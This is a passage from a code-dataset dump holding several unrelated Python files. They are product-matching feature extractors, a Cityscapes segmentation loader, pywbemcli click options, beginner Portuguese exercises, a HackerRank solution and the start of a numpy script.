%s\" % type(col_val))\n return result_set\n\n result_ss = df.apply(f, axis=1)\n df[target_col] = result_ss\n return df\n\n\ndef _is_numal_expr(s):\n return next((ch for ch in s if str.isdigit(ch)), None)\n\n\ndef _is_colour(s):\n return s in _COLOURS\n\n\ndef parse_spec_cols(df, *cols):\n if not cols:\n raise ValueError(\"At least single column name was expected!\")\n for col_name in cols:\n _log.debug(\"Parsing specs in %s\", col_name)\n df[col_name + '_dict'] = df[col_name].apply(parse_specs_and_tokenize_vals)\n return df\n\n\ndef _tokenize_cols_ss(ss, cols):\n result_dict = {col_name + '_tokenized': nlp.tokenize(ss[col_name]) for col_name in cols}\n return pd.Series(result_dict)\n\n\ndef item_apply_fasttext(ft_model, item):\n if item.title_vector is None and item.title_tokenized is not None:\n item.title_vector, item.title_oov = _text_to_vector_fasttext(ft_model, item.title_tokenized)\n\n\nclass FeatureExtractor:\n def __init__(self, feature_name):\n self.feature_name = feature_name\n\n def extract(self, item1, item2):\n pass\n\n\nclass TwoArgComparisonBasedFE(FeatureExtractor):\n def __init__(self, feature_name, col1_name, col2_name, none_result=0):\n super().__init__(feature_name)\n self.col1_name = col1_name\n self.col2_name = col2_name\n self.none_result = none_result\n\n def extract(self, item1, item2):\n v1 = getattr(item1, self.col1_name)\n if v1 is None:\n return self.none_result\n v2 = getattr(item2, self.col2_name)\n if v2 is None:\n return self.none_result\n return self.extract_by_comparison(v1, v2)\n\n def extract_by_comparison(self, val1, val2):\n pass\n\n\nclass SharedWordNumFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_token_list, second_token_list):\n return len(set(first_token_list) & set(second_token_list))\n\n def __str__(self):\n return \"%s: SharedWordNum b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass WordJaccardFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_token_list, second_token_list):\n if first_token_list or second_token_list:\n return jaccard_sim(set(first_token_list), set(second_token_list))\n else:\n return 0\n\n def __str__(self):\n return \"%s: WordJaccard b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass ExactlySharedSpecNumFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n if len(first_spec_dict) <= len(second_spec_dict):\n x_dict = first_spec_dict\n y_dict = second_spec_dict\n else:\n x_dict = second_spec_dict\n y_dict = first_spec_dict\n share_count = 0\n for spec_key, x_val in x_dict.items():\n y_val = y_dict.get(spec_key)\n if x_val == y_val:\n share_count += 1\n return share_count\n\n def __str__(self):\n return \"%s: ExactlySharedSpecNum b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass ExactlySharedSpecPartFE(ExactlySharedSpecNumFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n shared_num = super().extract_by_comparison(first_spec_dict, second_spec_dict)\n denom = max(len(first_spec_dict), len(second_spec_dict))\n if denom == 0:\n return 0\n return shared_num / denom\n\n def __str__(self):\n return \"%s: ExactlySharedSpecPart b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass JaccardSharedSpecNumFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n if len(first_spec_dict) <= len(second_spec_dict):\n x_dict = first_spec_dict\n y_dict = second_spec_dict\n else:\n x_dict = second_spec_dict\n y_dict = first_spec_dict\n result = 0\n for spec_key, x_val in x_dict.items():\n y_val = y_dict.get(spec_key)\n if not y_val:\n continue\n x_set = set(x_val)\n y_set = set(y_val)\n result += jaccard_sim(x_set, y_set)\n return result\n\n def __str__(self):\n return \"%s: JaccardSharedSpecNum b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass JaccardSharedSpecPartFE(JaccardSharedSpecNumFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n shared_num = super().extract_by_comparison(first_spec_dict, second_spec_dict)\n denom = max(len(first_spec_dict), len(second_spec_dict))\n if denom == 0:\n return 0\n return shared_num / denom\n\n def __str__(self):\n return \"%s: JaccardSharedSpecPart b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass ParsedSpecFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n max_key_num = max(len(first_spec_dict), len(second_spec_dict))\n shared_keys = first_spec_dict.keys() & second_spec_dict.keys()\n unshared_keys = first_spec_dict.keys() ^ second_spec_dict.keys()\n if max_key_num == 0:\n # TODO most of the values here should be N/A-like\n shared_keys_num = 0\n shared_keys_part = 0\n unshared_keys_num = 0\n unshared_keys_part = 0\n else:\n shared_keys_num = len(shared_keys)\n shared_keys_part = shared_keys_num / max_key_num\n unshared_keys_num = len(unshared_keys)\n unshared_keys_part = unshared_keys_num / max_key_num\n #\n shared_exactly_counter = 0\n shared_jaccard_counter = 0\n shared_levenshtein_counter = 0\n max_val_chars = 0\n for k in shared_keys:\n x_toks = first_spec_dict.get(k)\n y_toks = second_spec_dict.get(k)\n if x_toks or y_toks:\n if x_toks == y_toks:\n shared_exactly_counter += 1\n shared_jaccard_counter += jaccard_sim(set(x_toks), set(y_toks))\n x_joined = ' '.join(x_toks)\n y_joined = ' '.join(y_toks)\n shared_levenshtein_counter += levenshtein(x_joined, y_joined)\n max_val_chars += max(len(x_joined), len(y_joined))\n if shared_keys_num == 0:\n # TODO most of the values here should be N/A-like\n shared_exactly_num = 0\n conflicting_exactly_num = 0\n shared_exactly_part = 0\n conflicting_exactly_part = 0\n shared_jaccard_sum = 0\n conflicting_jaccard_sum = 0\n shared_jaccard_part = 0\n conflicting_jaccard_part = 0\n shared_leven_sum = 0\n shared_leven_part = 0\n else:\n shared_exactly_num = shared_exactly_counter\n conflicting_exactly_num = shared_keys_num - shared_exactly_num\n shared_exactly_part = shared_exactly_num / shared_keys_num\n conflicting_exactly_part = conflicting_exactly_num / shared_keys_num\n shared_jaccard_sum = shared_jaccard_counter\n conflicting_jaccard_sum = shared_keys_num - shared_jaccard_sum\n shared_jaccard_part = shared_jaccard_sum / shared_keys_num\n conflicting_jaccard_part = conflicting_jaccard_sum / shared_keys_num\n shared_leven_sum = shared_levenshtein_counter\n if max_val_chars > 0:\n shared_leven_part = shared_leven_sum / max_val_chars\n else:\n shared_leven_part = 0\n #\n return [\n shared_keys_num,\n shared_keys_part,\n unshared_keys_num,\n unshared_keys_part,\n shared_exactly_num,\n shared_exactly_part,\n conflicting_exactly_num,\n conflicting_exactly_part,\n shared_jaccard_sum,\n shared_jaccard_part,\n conflicting_jaccard_sum,\n conflicting_jaccard_part,\n shared_leven_sum,\n shared_leven_part,\n ]\n\n\ndef jaccard_sim(s1, s2):\n isect = s1 & s2\n return len(isect) / (len(s1) + len(s2) - len(isect))\n\n\ndef levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[\n j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n\ndef extract_discriminator_word_features(train_indices, arg_df, tokenized_col1_name, tokenized_col2_name):\n df = arg_df.iloc[train_indices,\n [arg_df.columns.get_loc(cn) for cn in [\"item_yn\", tokenized_col1_name, tokenized_col2_name]]]\n # TODO\n\n\nclass FoldDependentFeatureExtractor:\n def extract(self, df, row_i):\n pass\n\n\nclass DiscriminatorWordsFeatureExtractor(FoldDependentFeatureExtractor):\n def __init__(self, arg_df, train_indices, tokenized_col1_name, tokenized_col2_name, freq_threshold=3):\n df = arg_df.iloc[train_indices,\n [arg_df.columns.get_loc(cn) for cn in [\"item_yn\", tokenized_col1_name, tokenized_col2_name]]]\n #\n print(\"Computing word discr table for cols %s and %s...\" % (tokenized_col1_name, tokenized_col2_name))\n word_dict = defaultdict(DiscrCounters)\n for row_tuple in df.itertuples():\n match = row_tuple[1] == 'yes'\n a_set = _to_set_safe(row_tuple[2])\n b_set = _to_set_safe(row_tuple[3])\n shared_set = a_set & b_set\n unshared_set = a_set ^ b_set\n for w in shared_set:\n w_counter = word_dict[w]\n if match:\n w_counter.match_shared += 1\n else:\n w_counter.nonmatch_shared += 1\n for w in unshared_set:\n w_counter = word_dict[w]\n if match:\n w_counter.match_unshared += 1\n else:\n w_counter.nonmatch_unshared += 1\n print(\"Words before prunning: %s\" % len(word_dict))\n self.word_counters = {w: w_counter for w, w_counter in word_dict.items() if w_counter.freq() >= freq_threshold}\n print(\"Words after prunning: %s\" % len(self.word_counters))\n\n\ndef _to_set_safe(l):\n \"\"\"\n :param l: a list or None\n :return: a set\n \"\"\"\n if l is None:\n return set()\n else:\n return set(l)\n\n\nclass DiscrCounters:\n def __init__(self):\n self.match_shared = 0\n self.match_unshared = 0\n self.nonmatch_shared = 0\n self.nonmatch_unshared = 0\n\n def freq(self):\n return self.match_shared + self.match_unshared + self.nonmatch_shared + self.nonmatch_unshared\n\n def shared_ratio(self):\n if self.match_shared == 0:\n return 0\n if self.nonmatch_shared == 0:\n return float(\"inf\")\n return self.match_shared / self.nonmatch_shared\n\n\nclass SpecValInTitleFeatureExtractor(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, v1, v2):\n if isinstance(v1, list) and isinstance(v2, dict):\n spec_dict = v2\n txt_tokens = v1\n elif isinstance(v2, list) and isinstance(v1, dict):\n spec_dict = v1\n txt_tokens = v2\n else:\n raise ValueError()\n result_counter = 0\n for key, val_tokens in spec_dict.items():\n if contains_subseq(txt_tokens, val_tokens):\n result_counter += 1\n return result_counter\n\n\ndef contains_subseq(seq, sub):\n if len(sub) > len(seq):\n return False\n for i in range(0, len(seq) - len(sub) + 1):\n if seq[i:i + len(sub)] == sub:\n return True\n return False\n\n\nclass IterableColumnMismatchFeatureExtractor(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, val1, val2):\n if not val1 or not val2:\n return 0\n return 1 if val1 == val2 else -1\n\n\nclass SetColumnJaccardIndexFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, set1, set2):\n if not set1 and not set2:\n return 0\n return jaccard_sim(set1, set2)\n\n\n_NA_SPEC_VALUES = {'na', 'apply', 'none'}\n\n\ndef attr_val_is_na(tok_list):\n if not tok_list:\n return True\n return len(tok_list) == 1 and tok_list[0] in _NA_SPEC_VALUES\n\n\nclass AttributeComparisonFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name, attr_func_dict):\n super().__init__(feature_name, col1_name, col2_name)\n self.attr_func_dict = attr_func_dict\n self.attr_keys_sorted = sorted(attr_func_dict.keys())\n\n def extract_by_comparison(self, dict1, dict2):\n result_list = []\n for attr_name in self.attr_keys_sorted:\n attr_func = self.attr_func_dict[attr_name]\n v1 = dict1.get(attr_name)\n v2 = dict2.get(attr_name)\n result_list.append(self._comp_sim(v1, v2, attr_func))\n return result_list\n\n def _comp_sim(self, v1, v2, attr_func):\n if v1 is None or attr_val_is_na(v1):\n return 0\n if v2 is None or attr_val_is_na(v2):\n return 0\n v1 = attr_func.normalize(v1)\n v2 = attr_func.normalize(v2)\n if v1 is None or v2 is None:\n return 0\n return attr_func(v1, v2)\n\n\nclass ExactStringAttributeSimilarity:\n def normalize(self, tok_list):\n return ' '.join(tok_list)\n\n def __call__(self, v1, v2):\n if v1 == v2:\n return 1\n else:\n return -1\n\n\nDEFAULT_ATTR_SIM_DICT = {\n 'brand': ExactStringAttributeSimilarity(),\n 'model': ExactStringAttributeSimilarity(),\n 'mpn': ExactStringAttributeSimilarity(),\n 'upc': ExactStringAttributeSimilarity(),\n 'network': ExactStringAttributeSimilarity(),\n 'publisher': ExactStringAttributeSimilarity(),\n 'carrier': ExactStringAttributeSimilarity(),\n 'card manufacturer': ExactStringAttributeSimilarity(),\n 'year': ExactStringAttributeSimilarity(),\n 'platform': ExactStringAttributeSimilarity(),\n}\n\n\nclass FasttextVectorBasedFE(FeatureExtractor):\n def __init__(self, feature_name):\n super().__init__(feature_name)\n\n def extract(self, item1, item2):\n v1, oov_list_1 = item1.title_vector, item1.title_oov\n v2, oov_list_2 = item2.title_vector, item2.title_oov\n return self.extract_from_vectors(v1, v2, oov_list_1, oov_list_2)\n\n def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n pass\n\n\ndef _text_to_vector_fasttext(ft_model, token_list, ret_oov_words=True):\n vec_list = []\n oov_words = []\n for t in token_list:\n if t in ft_model:\n vec_list.append(ft_model[t])\n else:\n oov_words.append(t)\n if len(vec_list) == 0:\n result_vec = np.zeros(ft_model.dim)\n else:\n result_vec = np.array(vec_list).mean(axis=0)\n return result_vec, oov_words if ret_oov_words else result_vec\n\n\nclass WVCosineSimilarityFE(FasttextVectorBasedFE):\n def __init__(self, feature_name):\n super().__init__(feature_name)\n\n def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n return cosine_sim(v1, v2)\n\n\nclass WVPerDimDiffFE(FasttextVectorBasedFE):\n def __init__(self, feature_name):\n super().__init__(feature_name)\n\n def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n diff_vec = v1 - v2\n return list(diff_vec)\n\n\nclass OutOfWVFE(FasttextVectorBasedFE):\n def __init__(self, feature_name):\n super().__init__(feature_name)\n\n def extract_from_vectors(self, v1, v2, oov_list_1, oov_list_2):\n if not oov_list_1:\n return 0\n oov_set1 = set(oov_list_1)\n if not oov_list_2:\n return 0\n oov_set2 = set(oov_list_2)\n return jaccard_sim(oov_set1, oov_set2)\n\n\ndef cosine_sim(v1, v2, fallback_val=0):\n v1_norm = np.linalg.norm(v1)\n if v1_norm == 0:\n return fallback_val\n v2_norm = np.linalg.norm(v2)\n if v2_norm == 0:\n return fallback_val\n dot_product = np.dot(v1, v2)\n return dot_product / (v1_norm * v2_norm)\n","sub_path":"runtimes/custom_scikit/src/cfepm/fe/feature_extractors.py","file_name":"feature_extractors.py","file_ext":"py","file_size_in_byte":22340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438377512","text":"\"\"\"\n Cityscapes semantic segmentation dataset.\n\"\"\"\n\nimport os\nimport numpy as np\nimport mxnet as mx\nfrom PIL import Image\nfrom .seg_dataset import SegDataset\nfrom .voc_seg_dataset import VOCMetaInfo\n\n\nclass CityscapesSegDataset(SegDataset):\n \"\"\"\n Cityscapes semantic segmentation dataset.\n\n Parameters:\n ----------\n root : str\n Path to a folder with `leftImg8bit` and `gtFine` subfolders.\n mode : str, default 'train'\n 'train', 'val', 'test', or 'demo'.\n transform : callable, optional\n A function that transforms the image.\n \"\"\"\n def __init__(self,\n root,\n mode=\"train\",\n transform=None,\n **kwargs):\n super(CityscapesSegDataset, self).__init__(\n root=root,\n mode=mode,\n transform=transform,\n **kwargs)\n\n image_dir_path = os.path.join(root, \"leftImg8bit\")\n mask_dir_path = os.path.join(root, \"gtFine\")\n assert os.path.exists(image_dir_path) and os.path.exists(mask_dir_path), \"Please prepare dataset\"\n\n mode_dir_name = \"train\" if mode == \"train\" else \"val\"\n image_dir_path = os.path.join(image_dir_path, mode_dir_name)\n # mask_dir_path = os.path.join(mask_dir_path, mode_dir_name)\n\n self.images = []\n self.masks = []\n for image_subdir_path, _, image_file_names in os.walk(image_dir_path):\n for image_file_name in image_file_names:\n if image_file_name.endswith(\".png\"):\n image_file_path = os.path.join(image_subdir_path, image_file_name)\n mask_file_name = image_file_name.replace(\"leftImg8bit\", \"gtFine_labelIds\")\n mask_subdir_path = image_subdir_path.replace(\"leftImg8bit\", \"gtFine\")\n mask_file_path = os.path.join(mask_subdir_path, mask_file_name)\n if os.path.isfile(mask_file_path):\n self.images.append(image_file_path)\n self.masks.append(mask_file_path)\n else:\n print(\"Cannot find the mask: {}\".format(mask_file_path))\n\n assert (len(self.images) == len(self.masks))\n if len(self.images) == 0:\n raise RuntimeError(\"Found 0 images in subfolders of: {}\\n\".format(image_dir_path))\n\n def __getitem__(self, index):\n image = Image.open(self.images[index]).convert(\"RGB\")\n if self.mode == \"demo\":\n image = self._img_transform(image)\n if self.transform is not None:\n image = self.transform(image)\n return image, os.path.basename(self.images[index])\n mask = Image.open(self.masks[index])\n\n if self.mode == \"train\":\n image, mask = self._train_sync_transform(image, mask)\n elif self.mode == \"val\":\n image, mask = self._val_sync_transform(image, mask)\n else:\n assert (self.mode == \"test\")\n image = self._img_transform(image)\n mask = self._mask_transform(mask)\n\n if self.transform is not None:\n image = self.transform(image)\n return image, mask\n\n classes = 19\n vague_idx = 19\n use_vague = True\n background_idx = -1\n ignore_bg = False\n\n _key = np.array([-1, -1, -1, -1, -1, -1,\n -1, -1, 0, 1, -1, -1,\n 2, 3, 4, -1, -1, -1,\n 5, -1, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15,\n -1, -1, 16, 17, 18])\n _mapping = np.array(range(-1, len(_key) - 1)).astype(np.int32)\n\n @staticmethod\n def _class_to_index(mask):\n values = np.unique(mask)\n for value in values:\n assert(value in CityscapesSegDataset._mapping)\n index = np.digitize(mask.ravel(), CityscapesSegDataset._mapping, right=True)\n return CityscapesSegDataset._key[index].reshape(mask.shape)\n\n @staticmethod\n def _mask_transform(mask):\n np_mask = np.array(mask).astype(np.int32)\n np_mask = CityscapesSegDataset._class_to_index(np_mask)\n np_mask[np_mask == -1] = CityscapesSegDataset.vague_idx\n return mx.nd.array(np_mask, mx.cpu())\n\n def __len__(self):\n return len(self.images)\n\n\nclass CityscapesMetaInfo(VOCMetaInfo):\n def __init__(self):\n super(CityscapesMetaInfo, self).__init__()\n self.label = \"Cityscapes\"\n self.short_label = \"voc\"\n self.root_dir_name = \"cityscapes\"\n self.dataset_class = CityscapesSegDataset\n self.num_classes = CityscapesSegDataset.classes\n self.test_metric_extra_kwargs = [\n {\"vague_idx\": CityscapesSegDataset.vague_idx,\n \"use_vague\": CityscapesSegDataset.use_vague,\n \"macro_average\": False},\n {\"num_classes\": CityscapesSegDataset.classes,\n \"vague_idx\": CityscapesSegDataset.vague_idx,\n \"use_vague\": CityscapesSegDataset.use_vague,\n \"bg_idx\": CityscapesSegDataset.background_idx,\n \"ignore_bg\": CityscapesSegDataset.ignore_bg,\n \"macro_average\": False}]\n","sub_path":"gluon/datasets/cityscapes_seg_dataset.py","file_name":"cityscapes_seg_dataset.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"439694160","text":"# (C) Copyright 2017 IBM Corp.\n# (C) Copyright 2017 Inova Development Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nDefines click options that are used for multiple scommands and that have\nthe same definition throughout the environment. This allows the characteristics\nand help to be defined once and used multiple times.\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport click\n\n#\n# property_list option - Defined here because the option is used in\n# multiple places in the command structure.\n#\npropertylist_option = [ # pylint: disable=invalid-name\n click.option('--pl', '--propertylist', 'propertylist', multiple=True,\n type=str,\n default=None, metavar='PROPERTYLIST',\n help='Filter the properties included in the returned '\n 'object(s). '\n 'Multiple properties may be specified with either a '\n 'comma-separated list or by using the option multiple '\n 'times. Properties specified in this option that are '\n 'not in the object(s) will be ignored. '\n 'The empty string will include no properties. '\n 'Default: Do not filter properties.')]\n\nnames_only_option = [ # pylint: disable=invalid-name\n click.option('--no', '--names-only', 'names_only', is_flag=True,\n required=False,\n help='Retrieve only the object paths (names). '\n 'Default: Retrieve the complete objects including '\n 'object paths.')]\n\ninclude_classorigin_instance_option = [ # pylint: disable=invalid-name\n click.option('--ico', '--include-classorigin', 'include_classorigin',\n is_flag=True, required=False,\n help='Include class origin information in the returned '\n 'instance(s). '\n 'Some servers may ignore this option. '\n 'Default: Do not include class origin information.')]\n\ninclude_classorigin_class_option = [ # pylint: disable=invalid-name\n click.option('--ico', '--include-classorigin', 'include_classorigin',\n is_flag=True, required=False,\n help='Include class origin information in the returned '\n 'class(es). '\n 'Default: Do not include class origin information.')]\n\nnamespace_option = [ # pylint: disable=invalid-name\n click.option('-n', '--namespace', type=str,\n required=False, metavar='NAMESPACE',\n help='Namespace to use for this command, instead of the '\n 'default namespace of the connection.')]\n\nsummary_option = [ # pylint: disable=invalid-name\n click.option('-s', '--summary', is_flag=True, required=False,\n help='Show only a summary (count) of the objects.')]\n\nverify_option = [ # pylint: disable=invalid-name\n click.option('-V', '--verify', is_flag=True, required=False,\n help='Prompt for confirmation before performing a change, '\n 'to allow for verification of parameters. '\n 'Default: Do not prompt for confirmation.')]\n\nmultiple_namespaces_option = [ # pylint: disable=invalid-name\n click.option('-n', '--namespace', type=str, multiple=True,\n required=False, metavar='NAMESPACE',\n help='Add a namespace to the search scope. '\n 'May be specified multiple times. '\n 'Default: Search in all namespaces of the server.')]\n\n#\n# The following options are implement the filtering of class request\n# operations to filter by selected class qualifiers\n#\nassociation_filter_option = [ # pylint: disable=invalid-name\n click.option('--association/--no-association',\n default=None,\n help='Filter the returned classes to return only indication '\n 'classes (--association) or classes that are not '\n 'associations(--no-association). If the option is not '\n 'defined no filtering occurs')]\n\nindication_filter_option = [ # pylint: disable=invalid-name\n click.option('--indication/--no-indication',\n default=None,\n help='Filter the returned classes to return only indication '\n 'classes (--indication) or classes that are not '\n 'indications (--no-indication). If the option is not '\n 'defined no filtering occurs')]\n\nexperimental_filter_option = [ # pylint: disable=invalid-name\n click.option('--experimental/--no-experimental',\n default=None,\n help='Filter the returned classes to return only experimental '\n 'classes (--experimental) or classes that are not '\n 'experimental (--no-iexperimental). If the option is not '\n 'defined no filtering occurs')]\n\n\ndef add_options(options):\n \"\"\"\n Accumulate multiple options into a list. This list can be referenced as\n a click decorator @att_options(name_of_list)\n\n The list is reversed because of the way click processes options\n\n Parameters:\n\n options: list of click.option definitions\n\n Returns:\n Reversed list\n\n \"\"\"\n def _add_options(func):\n \"\"\" Reverse options list\"\"\"\n for option in reversed(options):\n func = option(func)\n return func\n return _add_options\n","sub_path":"pywbemtools/pywbemcli/_common_options.py","file_name":"_common_options.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388077447","text":"import math\nimport random\n# Desafio 03\nprimeiroNum = int(input(\"Digite o primeiro numero: \"))\nsegundoNum = int(input(\"Digite o segundo numero: \"))\nsoma = primeiroNum + segundoNum\n#A chave se refere as variaveis colocada em format x\nprint(\"A soma entre {} e {} vale {}\".format(primeiroNum, segundoNum,soma))\n\n# Desafio 03\n\nalgo = input(\"Digite algo: \")\n\nprint(type(algo))\nprint(algo.isalpha())\nprint(algo.isupper())\nprint(algo.islower())\nprint(algo.isnumeric())\n\n# Desafio 05\nnum = int(input(\"digite um numero: \"))\n\nantecessor = num - 1\nsucessor = num + 1\n\nprint(\"O numero antecessor é {} e numero sucessor é {}\".format(antecessor, sucessor))\n\n# Desafio 06\n\nnum = int(input(\"Digite um numero: \"))\n\ndobro = num*2\ntriplo = num *3\nraiz = math.sqrt(num)\n\nprint(\"O dobro de {} é {}, o triplo é {} e a raiz é {}\".format(num, dobro, triplo, raiz))\n\n# Desafio 07\n\nnota1 = float(input(\"Digite a primeira nota: \"))\nnota2 = float(input(\"Digite a segunda nota: \"))\n\nmedia = (nota1 + nota2) / 2\n\nprint(\"A media de {} e {} é {}\".format(nota1, nota2, media))\n\n# Desafio 08\n\nmedida = float(input(\"Digite a medida: \"))\n\ncm = medida * 100\nmm = medida * 1000\n\nprint(\"A medida de {} corresponde a {} cm e a {} mm\".format(medida, cm, mm))\n\n# Desafio 09 \n\nnumero = int(input(\"Digite um numero: \"))\nprint(\"-----------------\")\nfor i in range(1,11):\n num = numero * i\n\n print(\"{} x {} = {} \".format(numero, i, num))\nprint(\"----------------\")\n\n# Desafio 10\n\ndinheiro = float(input(\"Quanto de dinheiro vocẽ tem: R$ \"))\n\ndolar = dinheiro / 3.27\n\nprint(\"Com R$ {} voce pode comprar US$ {:.2f} dolares\".format(dinheiro, dolar))\n\n# Desafio 12\n\nvalor = float(input(\"Quanto custa o produtor: R$ \"))\ndesconto = int(input(\"Valor de desconto: \"))\n\nvalorPrevio = (desconto*valor) / 100\nvalorFinal = valor - valorPrevio\nprint(\"O produto vale R$ {} com o desconto de {} o valor fica de R$ {}\".format(valor, desconto, valorFinal))\n\n# Desafio 13\n\nsalario = float(input(\"Seu salario é: R$ \"))\naumento = int(input(\"Quantos porcento de aumento: \"))\n\nprevia = (salario*aumento) / 100\nsalarioFinal = salario + previa\nprint(\"Você recebe R$ {} com um aumento de {} %, você passa a receber R$ {:.2f}\".format(salario, aumento, salarioFinal))\n\n# Desafio 15\n\ndia = int(input(\"Quantos dias irá alugar o carro: \"))\nkm = float(input(\"Quantos km o carro irá roda: \"))\n\nvalor1 = dia*60\nvalor2 = km*0.15\n\nvalorFinal = valor1+valor2\n\nprint(\"O total a pagar é {}\".format(valorFinal))\n\n# Desafio 16\n\nnumero = float(input(\"Digite o numero: \"))\n\nnum = math.trunc(numero)\n\nprint(\"Valor digitado foi {} e sua porção inteira é {}\".format(numero, num))\n\n# Desafio 17\n\nco = float(input(\"Comprimento do cateto oposto: \"))\nca = float(input(\"Comprimento do cateto adjacente: \"))\nhi = math.hypot(co, ca) \n\nprint(\"A hipotenusa vai medir {:.2f}\".format(hi))\n\n# Desafio 18\n\nangulo = float(input(\"Digite o angulo: \"))\n\nsen = math.sin(math.radians(angulo))\ncos = math.cos(math.radians(angulo))\ntag = math.tan(math.radians(angulo))\n\nprint(\"O valor de {} em seno é {:.2f}\".format(angulo, sen))\nprint(\"O valor de {} em cosseno é {:.2f}\".format(angulo, cos))\nprint(\"O valor de {} em tangente é {:.2f}\".format(angulo, tag))\n\n# Desafio 19\n\nn1 = input(\"Digite um nome: \")\nn2 = input(\"Digite outro nome: \")\nn3 = input(\"Digite outro nome: \")\n\nlista = [n1,n2,n3]\n\nescolhido = random.choice(lista)\n\nprint(\"Nome sorteado foi {}\".format(escolhido))\n\n# Desafio 20\n\nn1 = input(\"Digite um nome: \")\nn2 = input(\"Digite outro nome: \")\nn3 = input(\"Digite outro nome: \")\n\nlista = [n1,n2,n3]\n\nrandom.shuffle(lista)\n\nprint(lista)\n","sub_path":"praticando.py","file_name":"praticando.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224983904","text":"#!/bin/python3\r\n\r\nimport sys\r\n\r\n\r\n#Maria plays n games of college basketball in a season.\r\n#Because she wants to go pro, she tracks her points scored per game sequentially in an array defined as score[] = [s0,s1,.....s[n-1].\r\n# After each game i, she checks to see if score s[i] breaks her record for most or least points scored so far during that season.\r\n#\r\n#Given Maria's array of scores for a season of n games, find and print the number of times she breaks her record for most and \r\n#least points scored during the season.\r\n#\r\n#Note: Assume her records for most and least points at the start of the season are the number of points scored \r\n#during the first game of the season.\r\n#\r\n#Input Format\r\n#\r\n#The first line contains an integer denoting n(the number of games). \r\n#The second line contains n space-separated integers describing the respective values of s[0],s[1],...s[n-1].\r\n\r\n\r\n\r\n\r\ndef getRecord(s):\r\n # Complete this function\r\n h = s[0]\r\n nh = 0\r\n nl =0\r\n l = s[0]\r\n for i in range(1,len(s)):\r\n if s[i] < l:\r\n nl = nl + 1\r\n l = s[i]\r\n elif s[i] > h:\r\n nh += 1\r\n h = s[i]\r\n return(nh,nl)\r\n \r\n \r\n \r\n \r\n \r\nn = int(input().strip())\r\ns = list(map(int, input().strip().split(' ')))\r\nresult = getRecord(s)\r\nprint (\" \".join(map(str, result)))\r\n","sub_path":"breakrecord.py","file_name":"breakrecord.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175352170","text":"import numpy as np\nimport os \ni=0\nlocation=\"/datastorage/simonsch/analyze_velocity/npy_velocities\"\n\nwhile(os.path.exists(location+\"/frame%d.npy\"%i)):\n\tinArray=np.load(location+\"/frame%d.npy\"%i)\n\tfor j in 